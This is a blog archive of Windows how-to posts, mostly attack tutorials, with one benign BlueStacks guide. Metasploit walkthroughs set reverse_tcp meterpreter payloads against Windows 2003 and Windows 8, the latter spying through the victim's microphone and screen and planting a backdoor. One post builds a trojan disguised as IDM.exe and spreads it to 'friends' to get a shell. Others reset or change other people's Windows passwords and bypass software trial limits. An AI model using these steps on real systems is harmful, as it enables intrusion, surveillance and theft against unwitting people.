Category Archives: Windows


How to pentest Remote PC (Windows 2003 server) with Metasploits - blackMORE Ops

This is a a detailed step by step guide on How to pentest Remote PC (Windows 2003 server) with Metasploits. I’ve used BackTrack 5 and Windows 2003 server in a virtual environment. The ease of pentesting is scary and readers, sysadmins are advised to update their Windows 2003 server to the latest patch/service pack and use additional antivirus, firewalls to protect them from similar situation. The author takes no responsibility on how this tutorial is being used by readers and this is for educational purpose only.


Metasploit is simple to use and is designed with ease-of-use in mind to aid Penetration Testers.
I will be taking you through this demo in BackTrack 5 R3, so go ahead and download that if you don’t already have it:

The reason for using BackTrack 5 R3 is because it has the correct Ruby Libraries.

Metasploit framework has three work environments,

  1. The msfconsole,
  2. The msfcli interface and
  3. The msfweb interface.

However, the primary and the most preferred work area is the‘msfconsole’. It is an efficient command-line interface that has its own command set and environment system.
Metasploit quick guide

Before executing your exploit, it is useful to understand what some Metasploit commands do. Below are some of the commands that you will use most. Graphical explanation of their outputs would be given as and when we use them while exploiting some boxes in later part of the article.

  1. search : Typing in the command search along with the keyword lists out the various possible exploits that have that keyword pattern.
  2. show exploits : Typing in the command show exploits‘ lists out the currently available exploits. There are remote exploits for various platforms and applications including Windows, Linux, IIS, Apache, and so on, which help to test the flexibility and understand the working of Metasploit.
  3. show payloads : With the same ‘show‘ command, we can also list the payloads available. We can use a ‘show payloads’ to list the payloads.
  4. show options : Typing in the command ‘show options‘ will show you options that you have set and possibly ones that you might have forgotten to set. Each exploit and payload comes with its own options that you can set.
  5. info : If you want specific information on an exploit or payload, you are able to use the ‘info’ command. Let’s say we want to get complete info of the payload ‘winbind’. We can use ‘info payload winbind‘.
  6. use : This command tells Metasploit to use the exploit with the specified name
  7. set RHOST : This command will instruct Metasploit to target the specified remote host.
  8. set RPORT : This command sets the port that Metasploit will connect to on the remote host.
  9. set PAYLOAD : This command sets the payload that is used to a generic payload that will give you a shell when a service is exploited.
  10. set LPORT : This command sets the port number that the payload will open on the server when an exploit is exploited. It is important that this port number be a port that can be opened on the server ( is not in use by another service and not reserved for administrative use), so set it to a random 4 digit number greater than 1024, and you should be fine. You’ll have to change the number each time you successfully exploit a service as well.
  11. exploit : Actually exploits the service. Another version of exploit,rexploit reloads your exploit code and then executes the exploit. This allows you to try minor changes to your exploit code without restarting the console
  12. help : The ‘help’ command will give you basic information of all the commands that are not listed out here.

Now that you are ready with all the basic commands you need to launch your exploit. Let’s choose a couple of scenarios to get control of a remotely connected machine.

Lab Setup:

Victim Machine
OS: Microsoft Windows Server 2003

Attacker (Our) Machine
OS: BackTrack 5 R3
Kernel version: Linux bt 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux
Metasploit Version: Built in version of metasploit 3.8.0-dev


The only information provided to us about the remote server is that it is a Windows 2003 Server and the Objective is to gain shell access of this remote server.

Detailed Steps

Step 1 – Scan with nmap for open ports

Perform an nmap scan of the remote server
The output of the nmap scan shows us a range of ports open which can be seen below in Figure 1.

Step 1 – Scan with nmap for open ports - blackMORE Ops

Figure 1

We notice that there is port 135 open. Thus we can look for scripts in Metasploit to exploit and gain shell access if this server is vulnerable.

Step 2 – Open msfconsole

In your copy of BackTrack, go to:
Application > BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole

Step 2 – Open msfconsole - blackMORE Ops

Figure 2

During the initialization of msfconsole, standard checks are performed. If everything works out fine we will see the display as shown in Figure 3.

Step 2 – Open msfconsole-2 - blackMORE Ops

Figure 3

Step 3 – Search RPC exploit in Metasploit

Now, we know that port 135 is open so, we search for a related RPC exploit in Metasploit.
To list out all the exploits supported by Metasploit we use the “show exploits” command. This exploit lists out all the currently available exploits and a small portion of it is shown below in Figure 4.

Step 3 – Search RPC exploit in Metasploit - blackMORE Ops

Figure 4

As you may have noticed, the default installation of the Metasploit Framework 3.8.0-dev comes with 696 exploits and 224 payloads, which is quite an impressive stockpile thus finding a specific exploit from this huge list would be a real tedious task. So, we use a better option. You can either visit the link another alternative would be to use the “search” command in Metasploit to search for related exploits for RPC.
In msfconsole type “search dcerpc” to search all the exploits related todcerpc keyword as that exploit can be used to gain access to the server with a vulnerable port 135. A list of all the related exploits would be presented on the msfconsole window and this is shown below in Figure 5.

Step 3 – Search RPC exploit in Metasploit-2 - blackMORE Ops

Figure 5

Step 4 – Gather info about target exploit

Now that you have the list of rpc exploits in front of you, we would need more information about the exploit before we actually use it. To get more information regarding the exploit you can use the command “info exploit/windows/dcerpc/ms03_026_dcom” which provides information such as available targets, exploit requirements, details of vulnerability itself, and even references where you can find more information. This is shown in Figure 6.

Step 4 – Gather info about target exploit - blackMORE Ops

Figure 6

Step 5 – Activate exploit

The command “use” activates the exploit environment for the exploit. In our case we would use the command “use exploit/windows/dcerpc/ms03_026_dcom” to activate our exploit.

Step 5 – Activate exploit - blackMORE Ops

Figure 7

From the above figure it is noticed that, after the use of the exploit “exploit/windows/dcerpc/ms03_026_dcom” the prompt changes from “msf>” to “msf exploit(ms03_026_dcom) >” which symbolizes that we have entered a temporary environment of that exploit.

Step 6 – Configure exploit

Now, we need to configure the exploit as per the need of the current scenario. The “show options” command displays the various parameters which are required for the exploit to be launched properly. In our case, the RPORT is already set to 135 and the only option to be set is RHOST which can be set using the “set RHOST” command.
We enter the command “set RHOST” and we see that the RHOST is set to

Step 6 – Configure exploit - blackMORE Ops

Figure 8

Step 7 – Set payload for exploit

The only step remaining now before we launch the exploit is setting the payload for the exploit. We can view all the available payloads using the “show payloads” command.
As shown in the below figure, “show payloads” command will list all payloads that are compatible with the selected exploit.

Step 7 – Set payload for exploit - blackMORE Ops

Figure 9

For our case, we are using the reverse tcp meterpreter which can be set using the command, “set PAYLOAD windows/meterpreter/reverse_tcp” which spawns a shell if the remote server is successfully exploited. Now again you must view the available options using “show options” to make sure all the compulsory sections are properly filled so that the exploit is launched properly

Step 7 – Set payload for exploit-2 - blackMORE Ops

Figure 10

We notice that the LHOST for out payload is not set, so we set it toout local IP ie. using the command “set LHOST

Step 8 – Launch exploit and establish connection

Now that everything is ready and the exploit has been configured properly it’s time to launch the exploit.

You can use the “check” command to check whether the victim machine is vulnerable to the exploit or not. This option is not present for all the exploits but can be a real good support system before you actually exploit the remote server to make sure the remote server is not patched against the exploit you are trying against it.

In out case as shown in the Figure below, our selected exploit does not support the check option.

Step 8 – Launch exploit and establish connection - blackMORE Ops

Figure 11

The “exploit” command actually launches the attack, doing whatever it needs to do to have the payload executed on the remote system.

Step 8 – Launch exploit and establish connection-2 - blackMORE Ops

Figure 12

The above figure shows that the exploit was successfully executed against the remote machine due to the vulnerable port 135.

This is indicated by change in prompt to “meterpreter >“.

Step 9 – Perform an action on pentested server

Now that a reverse connection has been setup between the victim and our machine, we have complete control of the server.

We can use the help command to see which all commands can be used by us on the remote server to perform the related actions as displayed in the below Figure.

Below are the results of some of the meterpreter commands.

Step 9 – Perform an action on pentested server - blackMORE Ops

Figure 13

Step 9 – Perform an action on pentested server-2 - blackMORE Ops


How to Play Android Games on PC?

Android is one of the best mobile operating system around especially with the array of various apps and services it provides users. But not everyone has access to an android phone. This doesn’t mean you have to miss out on all the cool stuff. You can use BlueStacks to do the trick. It is an easy to use android emulator for the PC. The app was mainly created as a means for android testing for developers but now it is being widely used as an alternative gaming platform. Even though the software is in its beta version everything works just fine. Here I will show you how to setup BlueStacks on your computer and use it to play Android games on PC.

Play Android Games on PC with BlueStacks Emulator

Download BlueStacks

You can download the software from their official website which provides an online installer which can be downloaded from here. It will download files during the installation process. If you don’t prefer using the online installer, the BlueStacks offline installer can be downloaded from here. Both installation processes are quite straightforward and it will be completed quickly.


This is how the home page looks like. Its interface is similar to a tablet. It has the home, back, recent apps, share and close buttons on the bottom. You can download apps from Google PlayStore,  GetJar, Amazon AppStore or 1Mobile Market. You can also directly install apps if you already have the APK files downloaded.

Download Apps Online

In order to download apps from Google PlayStore you will have to provide a Google account. You can get this done from the settings options on the top of the screen then Account and Sync. It will sync the contacts and other information from your Google account.

Account and Sync

Once this is done you can easily download apps of your choice. There is a wide variety of apps given on the home screen or you can  search for specific apps in the search option. When the download is finished the app can be found in the all apps options in the top right hand corner. You’ll also get a notification.

Download Apps

Install Android Games Offline

If you don’t have an active internet connection you can still install apps if you have their APK files. Once BlueStacks has been installed, you can install the apps simply by double-clicking the APK files. You can later run them using BlueStacks just by clicking on it. So if you don’t want to go through all the online stores this is the best way to go.

Install APK on Computer Using BlueStacks

Sync Your Phone With PC

You can sync your android phone with BlueStacks. This way you will have all your apps, contacts and other stuff on both devices. For this you have to download BlueStacks Cloud Connect to your phone. You will have to click on the time in the menu bar below. Click on the pop-up menu that appears then select settings.


Click on the cloud connect option then you will be asked to provide your email ID and phone number. Once that is done a PIN will be provided to you which should be provided at the time the Cloud Connect app is opened on your mobile. This way you can use WhatsApp from your PC in case your mobile is out of order.

Cloud Sync

This is how you can download and install BlueStacks and run all Android apps or games on your computer. Though BlueStacks is an awesome way to experience Android on your computer, it does have it’s own set of cons. We’ll anyway discuss the pros first!

Pros of BlueStacks

1. BlueStacks is capable of running tons of games and apps available on PlayStore so there is something for everybody’s taste. You can use it as an emergency alternative for your phone as you can use your WhatsApp on your PC whilst the phone is being repaired.

2. The interface of BlueStacks is very similar to that of a smartphone or a tablet including home button, back button and even notification. So if you want to experience Android without spending hundreds of dollars buying a smartphone, BlueStacks is the best way to go. However you will have to wait for the latest version of Android as BlueStacks comes with the Gingerbread version which is outdated.

3. It provides online support too so you can play multi-player games online with your friends just like you’d play them on your smartphone or tablet. You can share your scores and compete with them as well.

4. With BlueStacks you can use the webcam of your PC to take photos using photo apps like Instagram, Flickr etc. You can now edit and share your pictures instantly.

5. Many Android games support gamepad but it’s tedious to play games on a smartphone using a gamepad. Using BlueStacks you can play these games on your PC turning your PC into a mini gaming console. Not all games support gamepad so don’t be shocked if you aren’t able to play your favorite game using a gamepad on your computer. It’s neither BlueStacks fault nor your gamepad’s. It’s just that not all Android apps or games are compatible with gamepads. Sometimes the brand of your gamepad might also cause problems. So always go for reputed brands and avoid cheap Chinese clones. Some gamepads I’ve tested so far include Logitech and Enter.

Cons of BlueStacks

Even though it is a brilliant emulator it has its own fair share of problems.

1. It requires a PC with an above average specs to run all the games without glitches. It requires a minimum of 4 GB RAM or the programs tend to lag. You can instead download the PC version of your favorite games and play them without BlueStacks. They’ll probably use less resources!

2. Multitasking can pose questions as it tends to slow down the machine.

3. BlueStacks runs on Android Gingerbread 2.3.4 and there is no way till now to update the operating system. So there will be some apps which won’t run and it can also have some memory management issues.

4. Some users who downloaded the offline installer found some viruses in it. The link which I have provided above is perfectly safe as I haven’t encountered any such problem so far.

5. Some antivirus software don’t support BlueStacks and abort the installation process so the fun ends even before it starts. But again I have to say I breezed through the installation process with no problems.

Even though there are other Android simulators available, few provide such flexibility and are easy to use. This is one of the best software around to play android apps on PC so download it and get started. Some complex ways include installing Android on your computer as a separate operating system, using Android SDK and using some paid emulators. I’ll soon include them in this list.

How To Hack Windows 8 With Metasploit

How To Exploit /  Hack Windows 8 With Metasploit

microsoft-237843_640Allot of you want to Hack Windows 8

In this article we’re going to learn how to exploit (Windows 8 Preview Build 8400) with client-side attack technique, we’ll get meterpreter session on windows 8 machine. For those who don’t know what is metasploit project.

The Metasploit Project is a computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known sub-project is the open-source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shell-code archive, and security research. The Metasploit Project is also well known for anti-forensic and evasion tools, some of which are built into the Metasploit Framework. (Wikipedia)

In this article we’re going to work with Metsaploit the console presented in the first graph.


Figure 1. Metasploit Console

How to prepare your labs ?

First You need Backtrack 5 with metasploit or you can download metasploit project for your system from link below: Secondly, you need “windows 8 preview Build 8400”


Figure 2. MSFGUI

Now ready For exploiting ??

1 – first, open the terminal and type “msfconsole“


I typed – sudo su – to take root privilage first because I’m not working on backtrack if you’re on backtack just type msfconsole in terminal as shown in Figure 3


Figure 3. Msf console terminal

Wait for a while and it will be opened, you’ll see a command line starts with MSF> – as shown in the Figure 4.


Figure 4. Msf command line

2 – Secondly, I’ll use an exploit called “Java_signed_applet” which targets JAVA vulnerable versions and can affect a huge amount of computers.

We’ll type in Msf > search java signed, as shown in Figure 5.


Figure 5. Search for java signed applet

We’ll use the first one exploit/multi/browser/java_signed_applet to use any exploit in metasploit project type “use” before exploit name. As shown in Figure 6.


Figure 6. Use exploit


To get more info about the exploit you can type “info” and you’ll get more information about this exploit – as shown in Figure 7. Here’s the exploit’s description and I think that now we understand how this exploit works (Listing 1). We need to know what’s option for this exploit so we’ll type in “show options” it’s included also in info, as shown in Figure 8.


Figure 7. Exploit information

Listing 1. Exploit Description


This exploit dynamically creates a .jar file via the

Msf::Exploit::Java mixin,then signs the it. The resulting signed

applet is presented to the victim via a web page with an applet tag.

The victim’s JVM will pop a dialog asking if they trust the signed

applet. On older versions the dialog will display the value of

CERTCN in the “Publisher” line. Newer JVMs display “UNKNOWN” when

the signature is not trusted (i.e., it’s not signed by a trusted

CA). The SigningCert option allows you to provide a trusted code

signing cert, the values in which will override CERTCN. If

SigningCert is not given, a randomly generated selfsigned cert will

be used. Either way, once the user clicks “run”, the applet executes


with full user permissions.


Figure 8. Show options

3 – Next, we’ll set the SRVHOST which will be the attacker IP. We’ll type “ifconfig” in terminal to get internal IP address, as shown in Figure 9 – it’s


Figure 9. ifconfig

• We’ll type in “set SRVHOST”

• We’ll set the target which is (1 – Windows x86) because we’re going to attack windows machine so type in “set target 1”

• We’ll set the LHOST which is Attacker IP and, because it’s inside an Internal network, we’ll set it with our local IP (


Figure 10. set SRVHOST


Figure 11. Set target


Figure 12. Set LHOST


If you’d like to attack outside your local network, you need to set your public IP address in LHOST, and enable DMZ on attacker machine or enable port forwarding.

• Now you need to know which payload you’ll use after attacking machine and the most familiar one is meterpreter, so we’ll set the payload (windows/meterpreter/reverse_tcp), as shown in Figure 13.


Figure 13. Set Payload


If you’d like to use another payload you can type in “show payloads” and choose your preferred payload.

• We’ll specify the URI which will be sent to victim machine. I want to make it on the main directory so I’ll type in “set URIPATH /“ as shown in Figure 14.


Figure 14. Set URIPATH


If you need to specify another URI name you can do it easily by typing in “set URIPATH name” and you can change “name” to your preferred word.

• We’ll type in “exploit” to run it, and it will give us the URI which is our IP address with your preferred URIPATH – Figure 15.


Figure 15. Exploit

Now, We need to send the URL to a victim machine so we’ll open it with our windows8 machine.

• Finally, a message will appear on victim machine after opening URL. If he/she clicked on Run, a meterpreter sessions will be opened in attacker PC, as shown in Figure 16.


Figure 16. Meterpreter

We Can do some commands with victim PC such as capturing screen or recording mic.

First, here’s the first command “sysinfo” – which tell you some information about the system (Figure 17).


Figure 17. System information

We can also see what the processes run at the time in victim machine with “ps” command (Figure 18).


Figure 18. Processes19).


Figure 19. Mic record

And, if you need to take a screen-shot of victim’s screen you can do it easily by “screenshot” command (Figure 20).


Figure 20. Screen-shot

Finally, I tried to upload payload and execute it in victim machine, so, if you want to keep the victim longer with you then you should upload another backdoor to keep in touch with them (Figure 21).


Figure 21. Upload executable file

If you need any help with meterpreter just type “help” and all commands will come up and show in your screen (Figure 22).


Figure 22. Help





How to crack Windows passwords

Related downloads:

The files inside the USB zip are exactly the same as on the CD. See below for instructions on how to make USB disk bootable.

How to make the CD

Unzipped, there should be an ISO image file (cd??????.iso). This can be burned to CD using whatever burner program you like, most support writing ISO-images. Often double-clikcing on it in explorer will pop up the program offering to write the image to CD. Once written the CD should only contain some files like “initrd.gz”, “vmlinuz” and some others. If it contains the image file “cd??????.iso” you didn’t burn the image but instead added the file to a CD. I cannot help with this, please consult you CD-software manual or friends.

The CD will boot with most BIOSes, see your manual on how to set it to boot from CD. Some will auto-boot when a CD is in the drive, some others will show a boot-menu when you press ESC or F10/F12 when it probes the disks, some may need to have the boot order adjusted in setup.

How to make an bootable USB drive

  • Copy all the files that is inside the or on the CD onto an usb drive, directly on the drive, not inside any directory/folder.
  • It is OK if there are other files on the USB drive from before, they will not be removed.
  • Install bootloader on the USB drive, from command prompt in windows (start the command line with “run as administrator” if possible)
    • X:syslinux.exe -ma X:
  • Replace X: with the drive letter the USB drive shows up as (DO NOT USE C:)
  • If it seems like nothing happened, it is usually done.
  • However, a file named ldlinux.sys may appear on the USB drive, that is normal.
  • It should now in theory be bootable.
  • Please know that getting some computers to boot from USB is worse than from CD, you may have to change settings, or some will not simply work at all.

    How to make the floppy

    The unzipped image (bdxxxxxx.bin) is a block-to-block representation of the actual floppy, and the file cannot simply be copied to the floppy. Special tools must be used to write it block by block.

  • Unzip the bd zip file to a folder of your choice.
  • There should be 3 files: bdxxxxxx.bin (the floppy image) and rawrite2.exe (the image writing program), and install.batwhich uses rawrite2 to write the .bin file to floppy.
  • Insert a floppy in drive A: NOTE: It will lose all previous data!
  • Run (doubleclick) install.bat and follow the on-screen instructions.


Offline NT Password & Registry Editor, Walkthrough


The following is a walkthrough of using the CD to reset one user (admin) on a test Vista computer.

Insert the CD and convince your BIOS that it should boot from it. How to boot from a CD varies from computer make to computer make, so it depends on your mainboard. Some BIOS shows a boot device select menu if you press ESC, F8, F11 or F12 or something like that during the self test. (some even tell you on the screen what to press)

If it boots, you should see this ->

Usually just press enter here. If you have linux knowledge, you can tweak kernel options if you need/like.

Then it boots and outputs a lot of kernel messages about your hardware and such.. most if not all are nothing to worry about.Click images to enlarge

Most of the generic linux boot now done, and we try to load the disk drivers. If you use the floppy version you will be asked to swap floppies at this point. Drivers are then tried based on PCI hardware indentification.

Most of these messages are from the drivers themselves. Some talk a lot, some doesn’t. But all give info on the brand and model and size of the disks found, if any.

Here you select one of the partitions listed above (in this case there is only one) or one of the letters from the menu. If there is a 100MB partition and a big one, select the big one.

Floppy users may need to do ‘f’ to load in more drivers from another floppy.

The ‘d’ option will re-run the PCI scan and start relevant drivers (they must already be loaded from floppy with ‘f’ option)

The ‘m’ for manual load will present a list of all the drivers with short description if available, and allow you to specify which to load. (Dependecies are handled automatically)

Here we only have one partition, so we just press enter to select it.

The registry is usually system32/config under WINDOWS or WINNT directory, depending on the windows version (and it may be changed during installation).

If the correct partition has been selected, the default prompt will be adjusted to match if it can find one of the usual variants.

Press enter, then the program will tell if the correct directory has been selected.Choice 1 is for password edit, most used.But if you wish, you can load any of the files (just enter it’s name) and do manual registry edit on them.

But here, we select 1 for password edit, some files are copied around into memory and the edit application is invoked.This demo shows selection 1 for password edit, but you can also do other things.

Note that 2, Syskey may be dangerous! AND NOT NEEDED TO RESET PASSWORDS! and does not work at all on Vista, but you get some info before you do any changes.

Selection 3, RecoveryConsole is only relevant for Win2k, XP and 2003 and you must have selected to load the SOFTWARE part of the registry (selection 2) earlier.

The manual registry editor is always available, it is not the most user-friendly thing, but anyway..

We continue our quest to change our “admin” users password..This is a list of all local users on the machine. You may see more users here than in the overly user-friendly control panel, for example XP has some help and support built in users.

The users marked “ADMIN” are members of the administrators group, which means they have admin rights, if you can login to one of them you can get control of the machine.

The buildt in (at install time in all windows versions) administrator is always RID 01f4. This example is from Vista, and Vista by default has this locked down (the installer instead asks and makes another user the regular use administrator, in this case RID 03e8)

The “lock?” collumn show if the user account is disabled or locked out (due to many logon attempts for example) or BLANK if the password seems to be blank.

We select to edit the “admin” user (this was the user made administrator by the Vista installer)Some status info, user is locked out if “Disabled” is set or “Failed login count” is larger than “max tries” policy setting. This user is not locked in any way. The lockout can be reset with option 4 below.

UNIQc3248b14af41d476-pre-00000002-QINUHere we just reset/clear/blank the password.

But you can also try to set a new password with option 2, but it will only work if the password is not blank already. Also, it often fails to work on XP and newer systems.

Number 3 is to put a non-admin user into the administrators (220) group, thus making the user an administrator. IT IS STILL EXPERIMENTAL AND IT MAY sometimes RESULT IN STRANGE ERRORS WHEN LATER EDITING THE GROUP FROM WINDOWS! Also, usually pointless in promoting the Guest user, as it is most likely forbidden to log in by the security policy settings.Exclamation point ! quits out (it’s SHIFT 1 on the US keyboard layout used on the boot CD)

Then we get back to the main menu, and select to quit..You must answer y, or the changes will not be saved. This is the last chance to change your mind!

Only changed files of the registry are actually written back.

If you forgot something, you may run again, else press CTRL-ALT-DEL to reboot.If you see an error message now, this does not mean that it isn’t working.

Reboot and test if Windows can be accessed again.


Note: This trick works only if the computer is turned on and then you can change the password.

Step 1: Click on start and then search for cmd (i.e., command prompt).

Step 2: Right click and then click on Run as administrator. It will prompt for request to proceed. Click on OK and then the command window will open.

Step 3: Type net user. This command is used to find the name of all the user account present in the computer.

Step 4: Change the password of all the user account one by one by typing.
net user useraccount password

Here useraccount is the account which you got from the step 3 and in place of password type your desired password.
With these simple steps you can change your Windows password or even of yours friends.


Reuse the software after the trial period is over

This is very a common question faced day to day by a common man… How can I reuse the software whose trial period has been elapsed?
For this you need to follow these simple steps but beware any mistake can leads to several problems in your laptop. So do this with care and if you are not sure then don’t do this.

Step 1: Uninstall the software and follow the steps.
Step 2: After uninstalling software, OpenRUN (Windows key + R) and type regedit and hit Enter.
Step 3: Then Registry Editor Window will appear and here navigate to HKEY_LOCAL_MACHINE SOFTWARE Your Software name from left pane of this window. If you find any Key name with your software name then simply delete that Key.
Step 4: Similarly navigate to HKEY_CURRENT_USER Software Your Software name and if you find any key with your software name then just delete it and close the Registry Editor window.
Step 5: Again go to RUN and type %temp% and hit Enter.
Step 6: Now Delete all the things in that temporary folder. Don’t panic as these are the temporary files and are not necessary for your operating system.
Step 7: Now go to C:Usersyour username hereAppData. Under AppData open all three folders”Local”, “Local Low” and “Roaming”and check. Under these three folders if you find any folder or anything with your Software’s name, just delete it.
Step 8: Now Restart your PC and instalal the expired software and you can use it again for trial period.


Lets Start,

OK, so basically we need to create a payload…. 
So, boot your Backtrack 5 and open the Terminal/Console.
<your payload> <LHOST=<your ip> <LPORT=<Port number > x >  < path>/< name of payload>
msfpayload windows/meterpreter/reverse_tcp LHOST=(your ip add) LPORT=4444 x > root/desktop/IDM.exe
This should create your IDM.exe msfpayload,
Now, you need to upload your file, which in this case is IDM.exe, to any file uploading and sharing site such as MediaFire or 4shared …
Now, you need to tell this download link of your file to your friends and let them download it….
Open a new terminal and type in,
It will take some time…
After some time it will open the MSFCONSOLE window….
type in,
             use exploit/multi/handler
Now, set the payload by typing in….
             set PAYLOAD windows/meterpreter/reverse_tcp
Now, set Local Host by typing ,, 
            set LHOST (your ip here)
Now after setting up the Payload and the Local Host its time to start the exploit.
Now type in……………………………
and press enter……
and wait till your friend or the victim installs the file, which is IDM.exe …..
Once the victim has downloaded the file and has installed the file and has run it on his computer then you will see the responses on your computer and then type in…


this is to create a channel..if nothing happens then type in shell again..After the channel is created you can access the Windows…

Now you will see that you access to the C drive of the victims computer…basically the drive on which the OS is installed on..So if you want then type in

to get the system information about the victims computer…
You can also create a directory on the victims drive and then transfer viruses or trojans on the computer….!

Now top prevent anyone from doing this on your computer have a Firewall!